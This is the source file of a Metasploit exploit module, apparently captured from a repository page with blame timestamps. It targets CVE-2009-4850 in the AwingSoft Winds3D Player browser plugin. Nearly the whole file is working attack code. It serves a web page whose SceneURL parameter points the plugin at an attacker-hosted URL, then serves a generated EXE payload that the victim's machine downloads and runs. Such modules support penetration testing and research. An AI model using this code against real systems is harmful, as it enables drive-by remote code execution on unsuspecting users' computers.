metasploit-framework/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb

84 lines
2.5 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = ExcellentRanking
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'AwingSoft Winds3D Player 3.5 SceneURL Download and Execute',
'Description' => %q{
This module exploits an untrusted program execution vulnerability within the
Winds3D Player from AwingSoft. The Winds3D Player is a browser plugin for
IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL'
parameter to the URL to an executable, an attacker can execute arbitrary
code.
2013-08-30 21:28:54 +00:00
Testing was conducted using plugin version 3.5.0.9 for Firefox 3.5 and
IE 8 on Windows XP SP3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'jduck' # original discovery & metasploit module
],
'References' =>
[
[ 'CVE', '2009-4850' ],
[ 'OSVDB', '60049' ]
],
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { }],
],
'DisclosureDate' => 'Nov 14 2009',
'DefaultTarget' => 0))
end
2013-08-30 21:28:54 +00:00
def on_request_uri(cli, request)
2013-08-30 21:28:54 +00:00
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
2013-08-30 21:28:54 +00:00
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
data = generate_payload_exe({ :code => p.encoded })
print_status("Sending EXE payload")
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
2013-08-30 21:28:54 +00:00
# Handle the payload
# handler(cli)
return
end
2013-08-30 21:28:54 +00:00
# otherwise, send the html..
html = %Q|<html>
<body>
<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903'
codebase='http://www.awingsoft.com/zips/WindsPly.CAB'>
<param name="SceneURL" value="#{payload_url}#">
<embed type="application/x-awingsoft-winds3d" src="#{payload_url}">
</object>
|
2013-08-30 21:28:54 +00:00
print_status("Sending #{self.name} HTML")
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })
2013-08-30 21:28:54 +00:00
end
end